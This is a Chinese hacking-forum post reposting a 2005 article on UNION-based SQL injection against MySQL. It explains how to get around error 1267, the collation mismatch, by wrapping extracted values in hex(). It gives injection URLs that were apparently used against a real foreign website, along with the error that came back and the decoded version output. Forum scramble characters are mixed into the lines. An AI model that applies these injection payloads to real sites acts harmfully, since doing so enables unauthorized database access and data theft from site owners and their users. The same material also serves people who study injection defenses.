找回密码
 立即注册
查看: 2791|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei
) i' a) O8 A& C- p文章性质:原创6 }5 S1 x; T2 L! ?2 d0 y/ P! Y
发布日期:2005-10-18
: F7 D/ D5 _) S- v  ?测试个国外的站时:
+ E: a1 C# F* iurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*) V5 S4 l8 d: ?
返回错误:
+ \2 ]2 D4 E% j7 Q  A8 qIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
  {9 b  R. ^5 o; a* h5 @9 yMySQL Error No. 126. v; `0 A9 ~8 U) }) e% q7 X* ~
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
3 k. `- m. {/ Q% h% r- m0 w解决办法:转为其他编码如hex。; G+ u2 _; q' K0 }( O$ l. r9 Y
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
. t2 u+ T- _" ]9 r% L成功得到hex(version())的值为:
7 g; m  F  b% f9 e5 v' m) M342E312E332D626574612 B! Z: \6 D& C6 K
回Mysql查询下得到:
7 ~( x" E4 C! Z, Vmysql> select 0x342E312E332D62657461;; s3 z) M- m# G5 N3 e
+------------------------+
+ `! B9 w) }: Z! u" S& O& n| 0x342E312E332D62657461 |$ Q4 W$ f5 i7 y
+------------------------+6 F2 a, U  o3 v* j+ Z- O
| 4.1.3-beta |
- T  Q/ I& y, a, F/ b: ]. \+------------------------+5 A4 M: U6 m- ?/ e: l# s- E8 F
1 row in set (0.00 sec)3 q; T/ w# w# S

/ M% k( i5 o; @; c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表